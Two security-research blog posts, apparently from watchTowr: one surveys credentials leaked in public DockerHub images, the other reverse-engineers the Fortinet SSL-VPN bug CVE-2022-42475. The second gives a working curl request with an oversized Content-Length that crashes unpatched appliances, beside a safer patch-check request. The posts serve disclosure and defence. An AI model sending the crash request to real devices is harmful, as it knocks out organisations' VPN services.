Docker containers, favoured by application developers and DevOps teams worldwide, are used to package an entire system configuration into a single 'container', making it easy for end-users to start an application without having to configure their own system appropriately. For example, a developer who produces forum software could make such a container available to the wider public, containing not only their forum software, but also a database and web server, plus the appropriate configuration files to enable the application to "just work" out-of-the-box.

These 'containers' are usually stored in a 'registry', which can be configured to allow access only to an organisation's employees, or to the wider public. One such registry, 'DockerHub', is operated by the developers of Docker themselves, and is designed to allow the public to easily share their images, in a similar manner to how GitHub allows developers to easily share their code.

When developing such a 'container', however, there is a risk that sensitive data is inadvertently included in the configuration of a container published publicly. This results in the wider public being able to access such sensitive data, and use it for nefarious purposes, which can often have a significant impact (discussed below).

One example could be in the hypothetical forum software I mention above. If the database is configured to allow remote connections, and it is also configured with a hardcoded password, then an attacker could extract the password from the container image and use it to access any instance of the software built from that container image.

Everyone Gets A Secret! - Over 2,000,000 Secrets

At this point it is important to note the inherent difficulty in attributing or validating secret data held by organisations with which we are not involved. For example, we found some data claiming to be a list of passwords for email accounts - but it is impossible for us to verify their validity without simply using them to log in, which would cross ethical and legal boundaries. Also difficult to classify are API tokens, which are strings similar to passwords, but with varying levels of permissions - given an API token, it is impossible for us to determine if it is a token holding powerful privileges, or a low-privilege token designed to be made public.

While we've made every effort to remove obvious false positives (for example, we saw secret keys such as "NotARealKey", which are obviously bogus), some may remain in the dataset. For purposes of calibration, however, here is an example file which we consider valid:

{
        "cf_email": "<redacted>",",
        "cf_apikey": "<redacted>",
        "cf_org": "<redacted>Prod",
        "cf_space": "<redacted>prodspace2",
        "cf_broker_memory": "512M",

        "devex": {
                "ace_app_space": "opsconsole",
                "ace_app_suffix": "dev",
                "bssr_client_id": "<redacted>",
                "bssr_client_secret": "<redacted>",
                "node_env": "production",
                "session_key": "opsConsole.sid",
                "session_secret": "<redacted>",
                "slack_endpoint": "<TBD>",
                "uaa_callback_url": "<redacted>",
                "uaa_client_id": "<redacted>",
                "uaa_client_secret": "<redacted>"
        },
        "CLOUDANT_USER": "<redacted>",
        "CLOUDANT_PASSWORD": "<redacted>",
        "BLUEMIX_CLOUDANT_DB_NAME": "<redacted>",
        "TERRAFORM_CLOUDANT_DB_NAME": "<redacted>",
        "CLOUDANT_DB_URL": "<redacted>",
        "BLUEMIX_SPACE": "<redacted>",
        "UAA_CLIENT_SECRET": "<redacted>",
        "UAA_CALLBACK": ""<redacted>",",
        "SESSION_CACHE": "Redis-cam-ui",
        "TERRAFORM_PLUGIN_ENDPOINTURL": "<redacted>/api",
        "CAM_TOKEN":"<redacted>",
        "A8_REGISTRY_TOKEN": "<redacted>",
        "A8_CONTROLLER_TOKEN": "<redacted>",
        "REDIS_HOST": "<redacted>",
        "REDIS_PASSWORD": "<redacted>",
        "REDIS_PORT": "<redacted>",
        "SRE_SLACK_WEBHOOK_URI":"https://hooks.slack.com/services/<redacted>
        ",
}

Looking at this file, we can deduce that 'cf' refers to Cloud Foundry, the popular cloud application platform (note the cf_org and cf_space entries). We also note credentials for "Terraform", which is a system used by DevOps engineers to provision entire 'fleets' of servers and build entire environments. Furthermore, there are connections to Slack, the popular business chat application, and other services. It is easy to imagine a scenario in which these credentials are leveraged to deploy ransomware across a large environment, resulting in considerable loss of business and revenue, especially given the presence of the string 'prodspace2', suggesting that this file contains secrets for a production environment.

This file is particularly interesting as it belongs to a Fortune-10 organisation, which is well-funded and motivated to secure its environments - we hope. Our initial expectation of finding only 'low-hanging fruit' was clearly exceeded here.

Our initial findings located a vast number of such secrets - around 2.5 million across the small subset of container images we reviewed from DockerHub: roughly 22,000 images, representing around 0.4% of all available container images.

Let's drill down into this huge number and find the most interesting data.

150,000 Unique Secrets

While a naΓ―ve analysis of the dataset suggests over 2.5 million credentials, the watchTowr team quickly identified a large number of 'false positives' and pared this number down to slightly over 1.1 million. Many of these are duplicated, however, and removing these duplicated results reveals a core of 152,000 unique secrets, sourced from around 22,000 vulnerable Docker images.

"I don't need no zero-dayz" - Docker Container Images  (1/4)
From the 2,500,000 initial potential credentials we pare down to 152,000
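Conceptually, the paring-down looks something like the sketch below - drop values matching obvious dummy patterns, then deduplicate what remains (the filter terms here are illustrative, not our full ruleset):

```python
# Illustrative dummy-value markers - our real ruleset is far larger
DUMMY_MARKERS = ("notarealkey", "changeme", "your-key-here")

def pare_down(candidates: list[str]) -> set[str]:
    unique = set()
    for value in candidates:
        value = value.strip()
        if not value:
            continue  # empty strings are noise
        if any(marker in value.lower() for marker in DUMMY_MARKERS):
            continue  # obvious false positive
        unique.add(value)
    return unique

secrets = pare_down(["AKIA1234REDACTED", "NotARealKey123", "hunter2", "hunter2"])
```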

We can further explore this dataset, breaking down our results and categorising by the service each secret applies to. This helps us suggest a more realistic assessment of the true risk that exposure entails.

"I don't need no zero-dayz" - Docker Container Images  (1/4)
The types of credentials we discovered

The majority of the secrets, as you can see, are those for "generic" API endpoints. These typically enable applications to integrate with external services, such as Cloudflare or Terraform. While this category is interesting, the remaining credentials have been categorised by the service they are associated with, which makes analysis much more useful. Let's put these "generic" results aside for now, and look more closely at the second-largest category - 'Cloud provider'.

Cloud Platform Access Keys - Cryptomining For Days

Once we set aside the 'generic' keys, we can see a large number of credentials (around 23% of our total) categorised as being for a 'Cloud Provider'. These services, such as Amazon's ubiquitous 'AWS' and Google's 'GCP', enable developers and DevOps teams to virtualise their compute resources, often running an entire company's infrastructure from one cloud account.

As mentioned before, these credentials are typically generated by developers and assigned a level of privilege appropriate to their intended use-case, with some keys designed for public consumption and some used for sensitive operations. While it is impossible for us to determine the privileges associated with each key without crossing ethical and legal boundaries, it is difficult to overstate the risk that these keys can potentially represent. Even on an unused account, a malicious actor can use these keys to run cloud services to mine cryptocurrency - an activity popular enough that it has spawned public tools such as the Denonia crypto miner to ease the process. With an active account, however, things are even worse, as a powerful cloud token allows access to virtual servers, S3 buckets, virtual networks, VPN traffic, and other resources.

History shows us the potential consequences of a cloud provider credential leak. Back in 2021, AWS accounts belonging to Ubiquiti were allegedly leaked by a disgruntled ex-employee, resulting in an extortion attempt (more info here) and a significant drop in stock price, highlighted in the red box below:

"I don't need no zero-dayz" - Docker Container Images  (1/4)
Stock market price change correlated to an AWS compromise (red rectangle)

This is not an isolated incident - those with longer memories may recall the 2020 story of a Cisco ex-employee who maliciously deleted ~450 virtual servers from Cisco's AWS account, resulting in one million USD of customer refunds and a further 1.4 million USD in employee time (more info here) as Cisco scrambled to recover during a two-week period. Clearly, the dangers of an exposed and compromised cloud provider account are significant and well-known.

🗨️
Over 30,000 unique access keys for Amazon AWS were found

However, this awareness was not reflected in our results. We found slightly over 30,000 unique AWS keys - a truly terrifying number, even though we expect a portion of these to be low-privilege tokens. Indeed, AWS keys alone form around 23% of the credentials we discovered.

Other cloud services were not absent from the data, either: we also found almost 90 keys for the competing Google Cloud Platform, as well as credentials for other services such as Alibaba Cloud. These keys would allow a similar-scale breach via other cloud providers.

We leave it to the reader's imagination and critical thinking as to the reason for the huge difference in the number of exposed keys per platform.

Payment Processing - Issuing All Of The Refunds

Keys for payment processors are highly valued by attackers for obvious reasons - they often represent the ability to transfer funds, issue refunds, or make payments. Any single leaked credential of this type almost certainly spells disaster for its owner - yet we still found over a hundred instances of these tokens in our crawl.

"I don't need no zero-dayz" - Docker Container Images  (1/4)
Zooming in on remaining secrets, we can see payment processor tokens are also exposed en-mass

These tokens are for a variety of services, but the most well-represented in our dataset is the payment processor 'Stripe', which is particularly popular for websites which wish to provide e-commerce abilities without handling card data directly. Stripe themselves comment on the power of these keys here:

Your secret API key can be used to make any API call on behalf of your account, such as creating a charge or performing a refund.

It seems obvious that the presence of these keys in our dataset is worrisome. What else do we have?

Social Media - Sending Tweets On Your Behalf

As shown in the graphic above, social media tokens are also prevalent in our haul: 301 images contained at least one such access token. We estimate that these would allow an adversary to post to, and manipulate, an organisation's online presence. Around 10% of these tokens were for Facebook, while LinkedIn and Twitter were also popular. We also noted tokens for mass-email providers such as SendGrid and MailGun.

"I don't need no zero-dayz" - Docker Container Images  (1/4)
Credentials for a variety of social media sites were discovered

While a breach of an organisation's social media account may seem minor compared to a compromise of payments, it still represents a significant risk. Years of careful public relations can be undone quickly as customers lose faith in an organisation's security posture, or sensitive data may be recovered via the account's 'Direct Messaging' feature. Often, attackers use compromised social media accounts to spread cryptocurrency scams for a quick payout (for an example, see here):

"I don't need no zero-dayz" - Docker Container Images  (1/4)
Bill Gates isn't really giving away Bitcoin!

While often overlooked, the use of a compromised social media account to facilitate additional social engineering attacks inside an organisation should not be underestimated.

Related to social media, we found 67 images containing tokens for the popular business-oriented communication application Slack. These tokens may allow an attacker to disrupt communications and even read private messages sent and received by employees via the service. While it is tempting to doubt the severity of such a breach, there are historic examples of attackers leveraging Slack - the 2020 breach of Animal Jam involved compromised AWS credentials exposed via a breach of their Slack environment.

SSH

On a more technical note, we found 559 images (~2.5%) containing a cryptographic 'host' key pair, typically used to secure a 'Secure Shell' (or 'SSH') connection for encrypted communication. We were able to determine that a subset of these keys are in use by active, publicly accessible endpoints on the wider internet. More seriously, 189 images contained at least one authentication key - potentially allowing an attacker to authenticate and execute commands on the host. Historic breaches involving such keys include the 2016 breach of DataDog.

Other Secrets

Of all the users of the Internet, few are more concerned with security than users of cryptocurrency. Nevertheless, we discovered six Docker containers which held cryptocurrency wallets, allowing anyone to access funds and perform transfers. We even found a key for an "onion" hidden service, as used by the Tor project to communicate extremely sensitive information securely.

Finally, we noted a small number of Docker images which included credentials to further Docker registries, such as those owned privately by an organisation.

The only discernible barrier to finding more credentials in this dataset seemed to be the amount of time we were willing to invest in searching, which does not bode well for anyone.

The Dataset

Finally, it may help to provide a quick summary of the dataset, to give an idea of the scale of our research.

Over a period of around three weeks, we obtained the newest tag from 22,194 docker images, which we believe is around 0.4% of the total available repositories at the time of publishing. These images contain around 240 million files, of which approximately 32 million (around 3.8 TB) are unique in their contents.

🗨️
Our dataset spans almost 4TB of data in 32 million unique files, taken from over 22,000 docker images

We selected docker images randomly, and analysed only their newest tag, in order to avoid a dataset skewed by a single container. For simplicity, we analysed only Linux-based containers on the amd64 platform. We believe our sample to be representative of the broader DockerHub file collection.

We used Amazon EC2 for the project, using mostly t2.xlarge workers (more detail will follow in subsequent posts). Our total spend was under 2000 USD, which speaks to the accessibility of the data we collected - this sum is low enough that an adversary might expect to recoup it by monetising access to the resultant stolen data.

As you can imagine, locating sensitive information in such a large dataset is a technical challenge. We've made every effort to remove false positives from the results we present here, but some may still remain - this topic will be discussed at length in a subsequent post. With some notable exceptions, it is impossible to verify if a secret is truly sensitive (for example, if a credential is valid) without actually trying to use it, which is not something we are able to do.

Summary

We're quite excited to share the methodology and further insights we gained from this research. To that end, we will be posting a series of weekly blog posts going into more technical detail on specific topics.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

We're Out Of Titles For VPN Vulns - It's Not Funny Anymore (Fortinet CVE-2022-42475)

31 January 2023 at 09:50

As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we analyse vulnerabilities in technology that is likely to be prevalent across the attack surfaces of our clients. This enables us to rapidly PoC and identify vulnerable systems across large attack surfaces.

You may have heard of the recent Fortinet SSL-VPN remote code execution vulnerability (or, more formally, 'CVE-2022-42475') being exploited by those pesky nation-state actors, and perhaps like us, you've been dying to understand the vulnerability in greater detail since the news of exploitation began - because well, it sounds exciting.

We'd like to insert a comment about the sad state of VPN appliance security here. Something about this being a repeated cycle across the VPN space, not specific to one particular vendor, but where we as an industry continue playing whack-a-mole for bugs straight out of the 90s and act shocked each time we see someone spraying their PoC across the Internet. Something like that. But with tact.

Naturally, though - we have a vested interest in understanding how to identify vulnerable appliances, and subsequently, exploit them - let's dive into our analysis, and see where it takes us...

Locating the bug

Fortinet's security advisory doesn't give us much to go by, in terms of exploitation:

[Image]
Helpful.

Naturally, we resort to comparing the fixed and vulnerable versions of the firmware. This is made slightly more difficult due to two factors - firstly, Fortinet's decision to release other updates in the same patch, and secondly, the monolithic architecture of the target environment, which loads almost all user-space code from a single 66 MB init executable.

We used Zynamics' BinDiff tool, alongside the IDA Pro disassembler, and identified that the following function had changed in an intriguing manner:

[Image: BinDiff comparison of the changed function]

While most of the code is identical between the two versions, you can see that an extra ja ("jump if above") conditional branch has been added, along with a comparison against the constant 0x40000000. Interesting. I guess this function is as good a place to start as any!

One thing that often makes reverse engineering patches - and this kind of work in general - easier on embedded devices is the frequent abundance of debug strings in the binary. Since the target market for network appliances is primarily concerned with uptime, enabling a remote engineer to diagnose and correct a problem is often more important than the vendor's preference for secrecy, and so error messages tend to be helpful and verbose. Indeed, if we examine the callers of this function, we can deduce its name - fsv_malloc:

[Image: callers of the function reveal its name, fsv_malloc]

Indeed, not only can we deduce the name of the function itself, but also that of its caller - in this case, malloc_block. This will help us work out how this function is used, and figure out if this function really is involved with the fix for CVE-2022-42475.

If we examine the references to our newly-discovered malloc_block, we find a caller named sslvpn_ap_pcalloc. Since the CVE we're hunting for deals with the SSL VPN functionality, it seems likely that this is a good place to look for more clues.

A quick look at the code references to it reveals that it is used in quite a few places - 96, to be exact - but some careful observation of the callers finds the most promising-sounding one, named read_post_data. Judging by the name, this function handles HTTP POST data, which we would expect to originate from untrusted users - let's take a closer look.

The function is straightforward, and appears to read the Content-Length HTTP header, allocate a buffer via our sslvpn_ap_pcalloc, and then proceed to read the HTTP POST body into the newly-minted buffer. Interestingly, though, this function also differs between vulnerable and patched versions.

After carefully discarding the unimportant differences, we are left with the following key difference (highlighted in a nice shade of pink):

[Image: the key difference between the vulnerable (left) and patched (right) code]

A keen eye - perhaps belonging to a reader who has spotted this kind of vulnerability before - might pick out the difference. On the left, we have the vulnerable code, containing:

lea esi, [rax+1]
movsxd rsi, esi

While on the right is the patched version:

lea rsi, [rax+1]

What's the difference between these two blocks? Surely a teeny tiny difference like that couldn't spell a remote-root compromise... right?! Well...

Of casting and typing

The presence of the movsxd (or 'move with sign-extend doubleword') opcode indicates that the compiler is promoting a signed 32-bit dword into a signed 64-bit qword. In C, this might look like int64_t widened = (int64_t)some_32bit_int;, for example. We can hazard a guess that the vulnerable code does this, and could perhaps resemble:

int32_t postDataSize = ...;
sslvpn_ap_pcalloc(.., postDataSize + 1);

Note that sslvpn_ap_pcalloc is declared as accepting a signed 64-bit size (an int64_t), so the result of the addition is converted from an int32_t to an int64_t by way of sign extension.

The problem arises, however, when the POST data size is set to the largest value that an int32_t can hold (since it is signed, this is 0x7FFFFFFF). In this case, the code will perform a 32-bit addition between the size (0x7FFFFFFF) and the constant 0x00000001, arriving at the result 0x80000000. When interpreted as a signed value, this is the lowest number that an int32_t can hold, -2147483648. Since sslvpn_ap_pcalloc requires an int64_t, the compiler helpfully sign-extends this into the 64-bit value 0xFFFFFFFF80000000. That's unexpected, but one could expect execution to continue without disaster, thinking that sslvpn_ap_pcalloc would interpret its argument as an extremely large unsigned integer, and simply fail the allocation. However, this is not the case. Time to delve into sslvpn_ap_pcalloc to explain why.
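Before we do, we can convince ourselves of the arithmetic by modelling the 32-bit addition and the subsequent sign extension outside of C - a quick Python sketch:

```python
def add32(a: int, b: int) -> int:
    # 32-bit addition with wraparound, as performed by the vulnerable code
    return (a + b) & 0xFFFFFFFF

def sign_extend_32_to_64(value: int) -> int:
    # movsxd: widen a 32-bit value to 64 bits, replicating the sign bit
    if value & 0x80000000:
        return value | 0xFFFFFFFF_00000000
    return value

content_length = 0x7FFFFFFF            # attacker-controlled Content-Length
requested = sign_extend_32_to_64(add32(content_length, 1))

# Reinterpret the 64-bit pattern as a signed value
as_signed = requested - (1 << 64) if requested >> 63 else requested
```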

The function sslvpn_ap_pcalloc is what is commonly known as a pool allocator - instead of simply allocating memory from the underlying memory manager (such as malloc), it attempts to minimise heap fragmentation and the number of allocations by allocating a large amount of memory, parts of which are then granted by subsequent calls to sslvpn_ap_pcalloc. Here's some C code which represents sslvpn_ap_pcalloc:

struct heapChunk
{
	int64_t endOfAllocation;
	struct heapChunk* previousChunk;
	char* nextFreeSpace;
	char data[];
};

struct pool
{
	struct heapChunk* info;
};

char* sslvpn_ap_pcalloc(struct pool* myPool, int64_t requestedSize)
{
  char* result = NULL;
  if ( requestedSize > 0 )
  {
    // Align the requested size up to the nearest 8 bytes
    uint64_t alignedSize = (((requestedSize - 1) / 8) + 1) * 8;

    // Is there enough space left in the current pool chunk?
    if ( &myPool->info->nextFreeSpace[alignedSize] > (char*)myPool->info->endOfAllocation )
    {
      // There is not enough space left. We must allocate a new chunk.
      int64_t chunkSize = global_sizeOfNewChunks;
      if ( chunkSize < alignedSize )
        chunkSize = alignedSize;

      // Allocate our new pool chunk, which will hold multiple allocations
      struct heapChunk* newChunk = malloc_block(chunkSize);

      // Link this new chunk into our list of chunks
      newChunk->previousChunk = myPool->info;
      newChunk->nextFreeSpace = newChunk->data;
      myPool->info = newChunk;

      // Now we can allocate from our new pool chunk.
      result = myPool->info->nextFreeSpace;
      myPool->info->nextFreeSpace = &result[alignedSize];
    }
    else
    {
      result = myPool->info->nextFreeSpace;
      myPool->info->nextFreeSpace += alignedSize;
    }
  }
  return memset(result, 0, requestedSize);
}

You can see that the function accepts a pool*, which holds information about previous allocations. This is the buffer from which allocations are serviced. For example, the first call to sslvpn_ap_pcalloc might have a requestedSize of 0x10. In order to service the request, sslvpn_ap_pcalloc would instead allocate a larger chunk (global_sizeOfNewChunks, around 0x400 bytes). It would note this allocation in the pool, and then return the start of this newly-allocated chunk to the caller. However, during the next call to sslvpn_ap_pcalloc , this pool buffer would be examined, and if it had enough free space, the function would then return a buffer from the pool instead of needing to call malloc a second time.

Of particular note is the signed nature of the requestedSize argument, and how it is treated. We can see that this parameter is first rounded up to the nearest 8-byte boundary, and then the current pool info is checked to see if there is enough space remaining, here:

uint64_t alignedSize = (((requestedSize - 1) / 8 ) + 1) * 8;

if ( &myPool->info->nextFreeSpace[alignedSize] > myPool->info->endOfAllocation ) { ... }

Note that requestedSize is a signed variable. In our corner case above, we've called the function with a requestedSize of 0xFFFFFFFF80000000, or -2147483648 in decimal. This causes the condition to evaluate as false - conceptually, we are asking whether the free space pointer minus 2147483648 is beyond the bounds of the allocated memory, which it usually is not.

Since the condition is evaluated as false, control passes as if the pool chunk has enough space remaining for the extra data, and then the chunk is initialised:

result = myPool->info->nextFreeSpace;
myPool->info->nextFreeSpace += alignedSize;
..
return memset(result, 0, requestedSize);

The memset statement dutifully attempts to set 0xFFFFFFFF80000000 bytes, starting at the heap chunk, which invariably causes the hosting process to crash.

That's a lot of theory - but does it work in practice?

The crash

Testing our theory is surprisingly simple - all we must do is send an HTTP request with a Content-Length header set to 2147483647 (i.e. 0x7FFFFFFF) to the SSL VPN process. The /remote/login endpoint is unauthenticated, so let's give it a go:

curl -v --insecure -H "Content-Length: 2147483647" --data 1 https://example.com:1234/remote/login
*   Trying example:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 2147483647
> Content-Type: application/x-www-form-urlencoded
>
* schannel: server closed abruptly (missing close_notify)
* Closing connection 0
* schannel: shutting down SSL/TLS connection with example.com port 1234
curl: (56) Failure when receiving data from the peer

Taking a look at the system logs, we can indeed see that the VPN process has died:

We're Out Of Titles For VPN Vulns - It's Not Funny Anymore (Fortinet CVE-2022-42475)
Ouch

Although debugging facilities are sparse on such an embedded device, fetching the debug logs does yield a little more information in the form of a register dump and stack trace at crash time.

7: <00376> firmware FortiGate-VM64-AWS v7.2.2,build1255b1255,220930 (GA.F) 
8: (Release)
9: <00376> application sslvpnd
10: <00376> *** signal 11 (Segmentation fault) received ***
11: <00376> Register dump:
12: <00376> RAX: 0000000000000000   RBX: ffffffff80000000
13: <00376> RCX: ffffffff7ff3b2c8   RDX: 00007f0cb74d22c8
14: <00376> R08: 00007f0cb74d22c8   R09: 0000000000000000
15: <00376> R10: 0000000000000000   R11: 0000000000000246
16: <00376> R12: ffffffff80000000   R13: 00007f0cb8149800
17: <00376> R14: 0000000000000000   R15: 00007f0cb742ad78
18: <00376> RSI: 0000000000000000   RDI: 00007f0cb7597000
19: <00376> RBP: 00007fff69b4bfa0   RSP: 00007fff69b4bf78
20: <00376> RIP: 00007f0cbd34876d   EFLAGS: 0000000000010286
21: <00376> CS:  0033   FS: 0000   GS: 0000
22: <00376> Trap: 000000000000000e   Error: 0000000000000007
23: <00376> OldMask: 0000000000000000
24: <00376> CR2: 00007f0cb7597000
25: <00376> stack: 0x7fff69b4bf78 - 0x7fff69b4eeb0 
26: <00376> Backtrace:
27: <00376> [0x7f0cbd34876d] => /usr/lib/x86_64-linux-gnu/libc.so.6  liboffset 
28: 0015a76d (memset)
29: <00376> [0x01655589] => /bin/sslvpnd (sslvpn_ap_pcalloc)
30: <00376> [0x0178ca72] => /bin/sslvpnd (read_post_data)
31: <00376> [0x0178643d] => /bin/sslvpnd  
32: <00376> [0x01787af0] => /bin/sslvpnd  
33: <00376> [0x01787bce] => /bin/sslvpnd  
34: <00376> [0x017880e1] => /bin/sslvpnd (mainLoop)
35: <00376> [0x0178938c] => /bin/sslvpnd (slave_main)
36: <00376> [0x0178a712] => /bin/sslvpnd (sslvpnd_main)
37: <00376> [0x00448ddf] => /bin/sslvpnd  
38: <00376> [0x00451e9a] => /bin/sslvpnd  
39: <00376> [0x0044e9fc] => /bin/sslvpnd (run_initentry)
40: <00376> [0x00451108] => /bin/sslvpnd (initd_mainloop) 
41: <00376> [0x00451a31] => /bin/sslvpnd  
42: <00376> [0x7f0cbd211deb] => /usr/lib/x86_64-linux-gnu/libc.so.6 
43: (__libc_start_main+0x000000eb) liboffset 00023deb
44: <00376> [0x00443c7a] => /bin/sslvpnd  
45: <00376> fortidev 6.0.1.0005
46: the killed daemon is /bin/sslvpnd: status=0xb

I've gone ahead and annotated the stack trace with memset, sslvpn_ap_pcalloc, and read_post_data for your convenience.

The arguments passed to memset are still present in the register dump, in rdx and rdi, as are a few registers used by the calling sslvpn_ap_pcalloc. We can see the size of the data we're trying to clear - 0xFFFFFFFF80000000 bytes - as well as the base of the buffer we're setting, at 0x00007f0cb74d22c8.

Okay, so that's useful to us as defenders - we can verify that a system is patched - but only in a very limited way.

We don't want to start crashing Fortinet appliances in production just to check if they are patched or not. Maybe there's a less intrusive way to check?


A more gentle touch

It turns out, yes, there is.

If you recall, the initial difference that piqued our interest was a change to the memory allocator, which will now reject HTTP requests with a Content-Length of over 0x40000000 bytes. There are other such checks added, presumably to add extra layers of safety to the large codebase. One such check will reject POST attempts which contain a payload of more than 1048576 (0x100000) bytes, responding with an HTTP "413 Request Entity Too Large" message instead of waiting for the transfer of the payload data.

This can be used to check that appliances are patched without risk of destabilising them, since even vulnerable systems are able to allocate a POST buffer of 0x100000 bytes, far beneath the troublesome value of 0x7fffffff. We don't even need to write any code - we can just use cURL:

curl --max-time 5 -v --insecure -H "Content-Length: 1048577" --data 1 https://example.com:1234/remote/login
*   Trying example.com:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 1048577
> Content-Type: application/x-www-form-urlencoded
>
* Operation timed out after 5017 milliseconds with 0 bytes received
* Closing connection 0
* schannel: shutting down SSL/TLS connection with example.com port 1234
curl: (28) Operation timed out after 5017 milliseconds with 0 bytes received

Contrast this with the response seen from an appliance which has been upgraded to v7.2.3:

curl --max-time 5 -v --insecure -H "Content-Length: 1048577" --data 1 https://example.com:1234/remote/login
*   Trying example.com:1234...
* Connected to example.com (example) port 1234 (#0)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server did not agree on a protocol. Uses default.
> POST /remote/login HTTP/1.1
> Host: example.com:1234
> User-Agent: curl/7.83.1
> Accept: */*
> Content-Length: 1048577
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 413 Request Entity Too Large
(other output omitted)

Summary

This is definitely not the first buggy VPN appliance we've seen and almost certainly won't be the last. Indeed, while searching for this bug, we accidentally found another bug - fortunately one limited to a crash of the VPN process via a null pointer dereference. Shrug.

Needless to say, it does not bode well for an appliance's security if a researcher is able to discover crashes by accident. VPN appliances are in a particularly precarious position on the network, since they must be exposed to hostile traffic almost as a prerequisite for existing. We at watchTowr consider it likely that similar bugs in Fortinet hardware - and other hardware in this class - will continue to surface as time goes by.

We would suggest that it's a very safe bet ;-)

Of course, one critical factor that can help determine real-world fallout from such bugs is the vendor's response - in this case, Fortinet. We were especially frustrated by Fortinet's posture in this regard, as they refused to release details of the bug once a patch was available, even though it was being actively exploited by attackers. We believe this stance weakens the security posture of Fortinet's customer base, making it more difficult to detect attacks and to determine with certainty that their devices are not affected.

This might sound trivial to those living in youthful freshness - but in an enterprise with 50,000 systems connected to the Internet, even working out whether you have a particular Fortinet device at all is non-trivial, let alone just saying 'patch, duh?'.

While this is a very simple bug in concept, there are a few factors that make it more difficult for researchers to pinpoint the exact issue, even when provided with Fortinet's "advisory". Part of this is inherent to the architecture of the appliance; having every binary compiled into a large init process (as I mentioned above) can make it more difficult for a reverse engineer to map dependencies and figure out what's going on.

Further, attempts to 'diff' the firmware and look for the code affected by the patch are hampered by Fortinet's approach of bundling multiple unrelated improvements and changes along with the patch. It is impossible to patch a Fortinet appliance without also applying changes to a large amount of unrelated functionality (and dealing with the associated 'known issues'). One imagines an overworked network administrator trying to weigh their chances - do they apply the patch, and suffer the potential consequences, or stay on their current version and risk being breached?

watchTowr clients have benefitted from early testing and warning of vulnerable devices in their environment - but to our earlier point, this wouldn't have to be the only way, had Fortinet been more forthcoming with helpful information about an actively exploited vulnerability.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.
